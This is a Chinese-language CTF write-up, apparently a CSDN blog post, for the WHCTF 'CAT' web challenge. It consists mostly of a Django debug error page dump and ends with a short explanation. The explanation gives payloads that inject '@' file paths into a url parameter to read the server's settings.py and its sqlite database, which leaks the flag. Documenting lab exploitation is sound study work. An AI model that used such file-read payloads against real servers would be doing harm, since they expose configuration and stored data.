      
        <tr>
          <td>SERVER_PROTOCOL</td>
          <td class="code"><pre>&#39;HTTP/1.1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_SOFTWARE</td>
          <td class="code"><pre>&#39;WSGIServer/0.1 Python/2.7.12&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TZ</td>
          <td class="code"><pre>&#39;UTC&#39;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.errors</td>
          <td class="code"><pre>&lt;open file &#39;&lt;stderr&gt;&#39;, mode &#39;w&#39; at 0x7fbf814b41e0&gt;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.file_wrapper</td>
          <td class="code"><pre>&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.input</td>
          <td class="code"><pre>&lt;socket._fileobject object at 0x7fbf7d5e82d0&gt;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.multiprocess</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.multithread</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.run_once</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.url_scheme</td>
          <td class="code"><pre>&#39;http&#39;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.version</td>
          <td class="code"><pre>(1, 0)</pre></td>
        </tr>
      
    </tbody>
  </table>


  <h3 id="settings-info">Settings</h3>
  <h4>Using settings module <code>api.settings</code></h4>
  <table class="req">
    <thead>
      <tr>
        <th>Setting</th>
        <th>Value</th>
      </tr>
    </thead>
    <tbody>
      
        <tr>
          <td>ABSOLUTE_URL_OVERRIDES</td>
          <td class="code"><pre>{}</pre></td>
        </tr>
      
        <tr>
          <td>ADMINS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>ALLOWED_HOSTS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>APPEND_SLASH</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>AUTHENTICATION_BACKENDS</td>
          <td class="code"><pre>[u&#39;django.contrib.auth.backends.ModelBackend&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>AUTH_PASSWORD_VALIDATORS</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>AUTH_USER_MODEL</td>
          <td class="code"><pre>u&#39;auth.User&#39;</pre></td>
        </tr>
      
        <tr>
          <td>BASE_DIR</td>
          <td class="code"><pre>&#39;/opt/api&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CACHES</td>
          <td class="code"><pre>{u&#39;default&#39;: {u&#39;BACKEND&#39;: u&#39;django.core.cache.backends.locmem.LocMemCache&#39;}}</pre></td>
        </tr>
      
        <tr>
          <td>CACHE_MIDDLEWARE_ALIAS</td>
          <td class="code"><pre>u&#39;default&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CACHE_MIDDLEWARE_KEY_PREFIX</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CACHE_MIDDLEWARE_SECONDS</td>
          <td class="code"><pre>600</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_AGE</td>
          <td class="code"><pre>31449600</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_DOMAIN</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_HTTPONLY</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_NAME</td>
          <td class="code"><pre>u&#39;csrftoken&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_PATH</td>
          <td class="code"><pre>u&#39;/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_COOKIE_SECURE</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_FAILURE_VIEW</td>
          <td class="code"><pre>u&#39;django.views.csrf.csrf_failure&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_HEADER_NAME</td>
          <td class="code"><pre>u&#39;HTTP_X_CSRFTOKEN&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CSRF_TRUSTED_ORIGINS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>DATABASES</td>
          <td class="code"><pre>{&#39;default&#39;: {&#39;ATOMIC_REQUESTS&#39;: False,
             &#39;AUTOCOMMIT&#39;: True,
             &#39;CONN_MAX_AGE&#39;: 0,
             &#39;ENGINE&#39;: &#39;django.db.backends.sqlite3&#39;,
             &#39;HOST&#39;: &#39;&#39;,
             &#39;NAME&#39;: &#39;/opt/api/database.sqlite3&#39;,
             &#39;OPTIONS&#39;: {},
             &#39;PASSWORD&#39;: u&#39;********************&#39;,
             &#39;PORT&#39;: &#39;&#39;,
             &#39;TEST&#39;: {&#39;CHARSET&#39;: None,
                      &#39;COLLATION&#39;: None,
                      &#39;MIRROR&#39;: None,
                      &#39;NAME&#39;: None},
             &#39;TIME_ZONE&#39;: None,
             &#39;USER&#39;: &#39;&#39;}}</pre></td>
        </tr>
      
        <tr>
          <td>DATABASE_ROUTERS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>DATA_UPLOAD_MAX_MEMORY_SIZE</td>
          <td class="code"><pre>2621440</pre></td>
        </tr>
      
        <tr>
          <td>DATA_UPLOAD_MAX_NUMBER_FIELDS</td>
          <td class="code"><pre>1000</pre></td>
        </tr>
      
        <tr>
          <td>DATETIME_FORMAT</td>
          <td class="code"><pre>u&#39;N j, Y, P&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DATETIME_INPUT_FORMATS</td>
          <td class="code"><pre>[u&#39;%Y-%m-%d %H:%M:%S&#39;,
 u&#39;%Y-%m-%d %H:%M:%S.%f&#39;,
 u&#39;%Y-%m-%d %H:%M&#39;,
 u&#39;%Y-%m-%d&#39;,
 u&#39;%m/%d/%Y %H:%M:%S&#39;,
 u&#39;%m/%d/%Y %H:%M:%S.%f&#39;,
 u&#39;%m/%d/%Y %H:%M&#39;,
 u&#39;%m/%d/%Y&#39;,
 u&#39;%m/%d/%y %H:%M:%S&#39;,
 u&#39;%m/%d/%y %H:%M:%S.%f&#39;,
 u&#39;%m/%d/%y %H:%M&#39;,
 u&#39;%m/%d/%y&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>DATE_FORMAT</td>
          <td class="code"><pre>u&#39;N j, Y&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DATE_INPUT_FORMATS</td>
          <td class="code"><pre>[u&#39;%Y-%m-%d&#39;,
 u&#39;%m/%d/%Y&#39;,
 u&#39;%m/%d/%y&#39;,
 u&#39;%b %d %Y&#39;,
 u&#39;%b %d, %Y&#39;,
 u&#39;%d %b %Y&#39;,
 u&#39;%d %b, %Y&#39;,
 u&#39;%B %d %Y&#39;,
 u&#39;%B %d, %Y&#39;,
 u&#39;%d %B %Y&#39;,
 u&#39;%d %B, %Y&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>DEBUG</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>DEBUG_PROPAGATE_EXCEPTIONS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>DECIMAL_SEPARATOR</td>
          <td class="code"><pre>u&#39;.&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_CHARSET</td>
          <td class="code"><pre>u&#39;utf-8&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_CONTENT_TYPE</td>
          <td class="code"><pre>u&#39;text/html&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_EXCEPTION_REPORTER_FILTER</td>
          <td class="code"><pre>u&#39;django.views.debug.SafeExceptionReporterFilter&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_FILE_STORAGE</td>
          <td class="code"><pre>u&#39;django.core.files.storage.FileSystemStorage&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_FROM_EMAIL</td>
          <td class="code"><pre>u&#39;webmaster@localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_INDEX_TABLESPACE</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DEFAULT_TABLESPACE</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DISALLOWED_USER_AGENTS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_BACKEND</td>
          <td class="code"><pre>u&#39;django.core.mail.backends.smtp.EmailBackend&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_HOST</td>
          <td class="code"><pre>u&#39;localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_HOST_PASSWORD</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_HOST_USER</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_PORT</td>
          <td class="code"><pre>25</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_SSL_CERTFILE</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_SSL_KEYFILE</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_SUBJECT_PREFIX</td>
          <td class="code"><pre>u&#39;[Django] &#39;</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_TIMEOUT</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_USE_SSL</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>EMAIL_USE_TLS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>FILE_CHARSET</td>
          <td class="code"><pre>u&#39;utf-8&#39;</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_DIRECTORY_PERMISSIONS</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_HANDLERS</td>
          <td class="code"><pre>[u&#39;django.core.files.uploadhandler.MemoryFileUploadHandler&#39;,
 u&#39;django.core.files.uploadhandler.TemporaryFileUploadHandler&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_MAX_MEMORY_SIZE</td>
          <td class="code"><pre>2621440</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_PERMISSIONS</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FILE_UPLOAD_TEMP_DIR</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FIRST_DAY_OF_WEEK</td>
          <td class="code"><pre>0</pre></td>
        </tr>
      
        <tr>
          <td>FIXTURE_DIRS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>FORCE_SCRIPT_NAME</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>FORMAT_MODULE_PATH</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>IGNORABLE_404_URLS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>INSTALLED_APPS</td>
          <td class="code"><pre>[&#39;django.contrib.admin&#39;,
 &#39;django.contrib.auth&#39;,
 &#39;django.contrib.contenttypes&#39;,
 &#39;django.contrib.sessions&#39;,
 &#39;django.contrib.messages&#39;,
 &#39;django.contrib.staticfiles&#39;,
 &#39;dnsapi&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>INTERNAL_IPS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGES</td>
          <td class="code"><pre>[(u&#39;af&#39;, u&#39;Afrikaans&#39;),
 (u&#39;ar&#39;, u&#39;Arabic&#39;),
 (u&#39;ast&#39;, u&#39;Asturian&#39;),
 (u&#39;az&#39;, u&#39;Azerbaijani&#39;),
 (u&#39;bg&#39;, u&#39;Bulgarian&#39;),
 (u&#39;be&#39;, u&#39;Belarusian&#39;),
 (u&#39;bn&#39;, u&#39;Bengali&#39;),
 (u&#39;br&#39;, u&#39;Breton&#39;),
 (u&#39;bs&#39;, u&#39;Bosnian&#39;),
 (u&#39;ca&#39;, u&#39;Catalan&#39;),
 (u&#39;cs&#39;, u&#39;Czech&#39;),
 (u&#39;cy&#39;, u&#39;Welsh&#39;),
 (u&#39;da&#39;, u&#39;Danish&#39;),
 (u&#39;de&#39;, u&#39;German&#39;),
 (u&#39;dsb&#39;, u&#39;Lower Sorbian&#39;),
 (u&#39;el&#39;, u&#39;Greek&#39;),
 (u&#39;en&#39;, u&#39;English&#39;),
 (u&#39;en-au&#39;, u&#39;Australian English&#39;),
 (u&#39;en-gb&#39;, u&#39;British English&#39;),
 (u&#39;eo&#39;, u&#39;Esperanto&#39;),
 (u&#39;es&#39;, u&#39;Spanish&#39;),
 (u&#39;es-ar&#39;, u&#39;Argentinian Spanish&#39;),
 (u&#39;es-co&#39;, u&#39;Colombian Spanish&#39;),
 (u&#39;es-mx&#39;, u&#39;Mexican Spanish&#39;),
 (u&#39;es-ni&#39;, u&#39;Nicaraguan Spanish&#39;),
 (u&#39;es-ve&#39;, u&#39;Venezuelan Spanish&#39;),
 (u&#39;et&#39;, u&#39;Estonian&#39;),
 (u&#39;eu&#39;, u&#39;Basque&#39;),
 (u&#39;fa&#39;, u&#39;Persian&#39;),
 (u&#39;fi&#39;, u&#39;Finnish&#39;),
 (u&#39;fr&#39;, u&#39;French&#39;),
 (u&#39;fy&#39;, u&#39;Frisian&#39;),
 (u&#39;ga&#39;, u&#39;Irish&#39;),
 (u&#39;gd&#39;, u&#39;Scottish Gaelic&#39;),
 (u&#39;gl&#39;, u&#39;Galician&#39;),
 (u&#39;he&#39;, u&#39;Hebrew&#39;),
 (u&#39;hi&#39;, u&#39;Hindi&#39;),
 (u&#39;hr&#39;, u&#39;Croatian&#39;),
 (u&#39;hsb&#39;, u&#39;Upper Sorbian&#39;),
 (u&#39;hu&#39;, u&#39;Hungarian&#39;),
 (u&#39;ia&#39;, u&#39;Interlingua&#39;),
 (u&#39;id&#39;, u&#39;Indonesian&#39;),
 (u&#39;io&#39;, u&#39;Ido&#39;),
 (u&#39;is&#39;, u&#39;Icelandic&#39;),
 (u&#39;it&#39;, u&#39;Italian&#39;),
 (u&#39;ja&#39;, u&#39;Japanese&#39;),
 (u&#39;ka&#39;, u&#39;Georgian&#39;),
 (u&#39;kk&#39;, u&#39;Kazakh&#39;),
 (u&#39;km&#39;, u&#39;Khmer&#39;),
 (u&#39;kn&#39;, u&#39;Kannada&#39;),
 (u&#39;ko&#39;, u&#39;Korean&#39;),
 (u&#39;lb&#39;, u&#39;Luxembourgish&#39;),
 (u&#39;lt&#39;, u&#39;Lithuanian&#39;),
 (u&#39;lv&#39;, u&#39;Latvian&#39;),
 (u&#39;mk&#39;, u&#39;Macedonian&#39;),
 (u&#39;ml&#39;, u&#39;Malayalam&#39;),
 (u&#39;mn&#39;, u&#39;Mongolian&#39;),
 (u&#39;mr&#39;, u&#39;Marathi&#39;),
 (u&#39;my&#39;, u&#39;Burmese&#39;),
 (u&#39;nb&#39;, u&#39;Norwegian Bokm\xe5l&#39;),
 (u&#39;ne&#39;, u&#39;Nepali&#39;),
 (u&#39;nl&#39;, u&#39;Dutch&#39;),
 (u&#39;nn&#39;, u&#39;Norwegian Nynorsk&#39;),
 (u&#39;os&#39;, u&#39;Ossetic&#39;),
 (u&#39;pa&#39;, u&#39;Punjabi&#39;),
 (u&#39;pl&#39;, u&#39;Polish&#39;),
 (u&#39;pt&#39;, u&#39;Portuguese&#39;),
 (u&#39;pt-br&#39;, u&#39;Brazilian Portuguese&#39;),
 (u&#39;ro&#39;, u&#39;Romanian&#39;),
 (u&#39;ru&#39;, u&#39;Russian&#39;),
 (u&#39;sk&#39;, u&#39;Slovak&#39;),
 (u&#39;sl&#39;, u&#39;Slovenian&#39;),
 (u&#39;sq&#39;, u&#39;Albanian&#39;),
 (u&#39;sr&#39;, u&#39;Serbian&#39;),
 (u&#39;sr-latn&#39;, u&#39;Serbian Latin&#39;),
 (u&#39;sv&#39;, u&#39;Swedish&#39;),
 (u&#39;sw&#39;, u&#39;Swahili&#39;),
 (u&#39;ta&#39;, u&#39;Tamil&#39;),
 (u&#39;te&#39;, u&#39;Telugu&#39;),
 (u&#39;th&#39;, u&#39;Thai&#39;),
 (u&#39;tr&#39;, u&#39;Turkish&#39;),
 (u&#39;tt&#39;, u&#39;Tatar&#39;),
 (u&#39;udm&#39;, u&#39;Udmurt&#39;),
 (u&#39;uk&#39;, u&#39;Ukrainian&#39;),
 (u&#39;ur&#39;, u&#39;Urdu&#39;),
 (u&#39;vi&#39;, u&#39;Vietnamese&#39;),
 (u&#39;zh-hans&#39;, u&#39;Simplified Chinese&#39;),
 (u&#39;zh-hant&#39;, u&#39;Traditional Chinese&#39;)]</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGES_BIDI</td>
          <td class="code"><pre>[u&#39;he&#39;, u&#39;ar&#39;, u&#39;fa&#39;, u&#39;ur&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_CODE</td>
          <td class="code"><pre>&#39;en-us&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_AGE</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_DOMAIN</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_NAME</td>
          <td class="code"><pre>u&#39;django_language&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LANGUAGE_COOKIE_PATH</td>
          <td class="code"><pre>u&#39;/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOCALE_PATHS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>LOGGING</td>
          <td class="code"><pre>{}</pre></td>
        </tr>
      
        <tr>
          <td>LOGGING_CONFIG</td>
          <td class="code"><pre>u&#39;logging.config.dictConfig&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOGIN_REDIRECT_URL</td>
          <td class="code"><pre>u&#39;/accounts/profile/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOGIN_URL</td>
          <td class="code"><pre>u&#39;/accounts/login/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>LOGOUT_REDIRECT_URL</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>MANAGERS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>MEDIA_ROOT</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>MEDIA_URL</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>MESSAGE_STORAGE</td>
          <td class="code"><pre>u&#39;django.contrib.messages.storage.fallback.FallbackStorage&#39;</pre></td>
        </tr>
      
        <tr>
          <td>MIDDLEWARE</td>
          <td class="code"><pre>[&#39;django.middleware.security.SecurityMiddleware&#39;,
 &#39;django.contrib.sessions.middleware.SessionMiddleware&#39;,
 &#39;django.middleware.common.CommonMiddleware&#39;,
 &#39;django.contrib.auth.middleware.AuthenticationMiddleware&#39;,
 &#39;django.contrib.messages.middleware.MessageMiddleware&#39;,
 &#39;django.middleware.clickjacking.XFrameOptionsMiddleware&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>MIDDLEWARE_CLASSES</td>
          <td class="code"><pre>[u&#39;django.middleware.common.CommonMiddleware&#39;,
 u&#39;django.middleware.csrf.CsrfViewMiddleware&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>MIGRATION_MODULES</td>
          <td class="code"><pre>{}</pre></td>
        </tr>
      
        <tr>
          <td>MONTH_DAY_FORMAT</td>
          <td class="code"><pre>u&#39;F j&#39;</pre></td>
        </tr>
      
        <tr>
          <td>NUMBER_GROUPING</td>
          <td class="code"><pre>0</pre></td>
        </tr>
      
        <tr>
          <td>PASSWORD_HASHERS</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PASSWORD_RESET_TIMEOUT_DAYS</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PREPEND_WWW</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>ROOT_URLCONF</td>
          <td class="code"><pre>&#39;api.urls&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SECRET_KEY</td>
          <td class="code"><pre>u&#39;********************&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_BROWSER_XSS_FILTER</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_CONTENT_TYPE_NOSNIFF</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_HSTS_INCLUDE_SUBDOMAINS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_HSTS_SECONDS</td>
          <td class="code"><pre>0</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_PROXY_SSL_HEADER</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_REDIRECT_EXEMPT</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_SSL_HOST</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SECURE_SSL_REDIRECT</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_EMAIL</td>
          <td class="code"><pre>u&#39;root@localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_CACHE_ALIAS</td>
          <td class="code"><pre>u&#39;default&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_AGE</td>
          <td class="code"><pre>1209600</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_DOMAIN</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_HTTPONLY</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_NAME</td>
          <td class="code"><pre>u&#39;sessionid&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_PATH</td>
          <td class="code"><pre>u&#39;/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_COOKIE_SECURE</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_ENGINE</td>
          <td class="code"><pre>u&#39;django.contrib.sessions.backends.db&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_EXPIRE_AT_BROWSER_CLOSE</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_FILE_PATH</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_SAVE_EVERY_REQUEST</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>SESSION_SERIALIZER</td>
          <td class="code"><pre>u&#39;django.contrib.sessions.serializers.JSONSerializer&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SETTINGS_MODULE</td>
          <td class="code"><pre>&#39;api.settings&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SHORT_DATETIME_FORMAT</td>
          <td class="code"><pre>u&#39;m/d/Y P&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SHORT_DATE_FORMAT</td>
          <td class="code"><pre>u&#39;m/d/Y&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SIGNING_BACKEND</td>
          <td class="code"><pre>u&#39;django.core.signing.TimestampSigner&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SILENCED_SYSTEM_CHECKS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>STATICFILES_DIRS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>STATICFILES_FINDERS</td>
          <td class="code"><pre>[u&#39;django.contrib.staticfiles.finders.FileSystemFinder&#39;,
 u&#39;django.contrib.staticfiles.finders.AppDirectoriesFinder&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>STATICFILES_STORAGE</td>
          <td class="code"><pre>u&#39;django.contrib.staticfiles.storage.StaticFilesStorage&#39;</pre></td>
        </tr>
      
        <tr>
          <td>STATIC_ROOT</td>
          <td class="code"><pre>None</pre></td>
        </tr>
      
        <tr>
          <td>STATIC_URL</td>
          <td class="code"><pre>&#39;/static/&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TEMPLATES</td>
          <td class="code"><pre>[{&#39;APP_DIRS&#39;: True,
  &#39;BACKEND&#39;: &#39;django.template.backends.django.DjangoTemplates&#39;,
  &#39;DIRS&#39;: [],
  &#39;OPTIONS&#39;: {&#39;context_processors&#39;: [&#39;django.template.context_processors.debug&#39;,
                                     &#39;django.template.context_processors.request&#39;,
                                     &#39;django.contrib.auth.context_processors.auth&#39;,
                                     &#39;django.contrib.messages.context_processors.messages&#39;]}}]</pre></td>
        </tr>
      
        <tr>
          <td>TEST_NON_SERIALIZED_APPS</td>
          <td class="code"><pre>[]</pre></td>
        </tr>
      
        <tr>
          <td>TEST_RUNNER</td>
          <td class="code"><pre>u&#39;django.test.runner.DiscoverRunner&#39;</pre></td>
        </tr>
      
        <tr>
          <td>THOUSAND_SEPARATOR</td>
          <td class="code"><pre>u&#39;,&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TIME_FORMAT</td>
          <td class="code"><pre>u&#39;P&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TIME_INPUT_FORMATS</td>
          <td class="code"><pre>[u&#39;%H:%M:%S&#39;, u&#39;%H:%M:%S.%f&#39;, u&#39;%H:%M&#39;]</pre></td>
        </tr>
      
        <tr>
          <td>TIME_ZONE</td>
          <td class="code"><pre>&#39;UTC&#39;</pre></td>
        </tr>
      
        <tr>
          <td>USE_ETAGS</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>USE_I18N</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>USE_L10N</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>USE_THOUSAND_SEPARATOR</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>USE_TZ</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>USE_X_FORWARDED_HOST</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>USE_X_FORWARDED_PORT</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>WSGI_APPLICATION</td>
          <td class="code"><pre>&#39;api.wsgi.application&#39;</pre></td>
        </tr>
      
        <tr>
          <td>X_FRAME_OPTIONS</td>
          <td class="code"><pre>u&#39;SAMEORIGIN&#39;</pre></td>
        </tr>
      
        <tr>
          <td>YEAR_MONTH_FORMAT</td>
          <td class="code"><pre>u&#39;F Y&#39;</pre></td>
        </tr>
      
    </tbody>
  </table>

</div>

  <div id="explanation">
    <p>
      You're seeing this error because you have <code>DEBUG = True</code> in your
      Django settings file. Change that to <code>False</code>, and Django will
      display a standard page generated by the handler for this status code.
    </p>
  </div>

</body>
</html>

由于文本太多了,我们就不一条一条的分析,直接划到最下方发现

python的模块 Django这个描述,之所以报错的原因是

django报错页面将输入的参数传到了后端的django服务中进行解析,而django设置了编码为gbk导致错误编码了宽字符(超过了ascii码范围)。

我们根据django的目录,
可以从配置文件settings.py的报错中看看有没有database的相关信息
?url=@/opt/api/api/settings.py 

 通过访问url我们能发现这个数据库是

sqlite3

 根据前面发现的数据库路径,构造payload “url=@/opt/api/database.sqlite3”, 成功爆出报错信息,并由此在POST数据中找到了flag。

flag:

WHCTF{yoooo_Such_A_G00D_@}

 

 

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界misc】CatFlag_攻防世界catflag,腾讯T3大佬亲自教你
m0_61330806的博客
04-09 543
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。薪资区间6k-15k。从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!④等保简介、等保规定、流程和规范。
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界 | CAT
diemaoye6838的博客
09-07 526
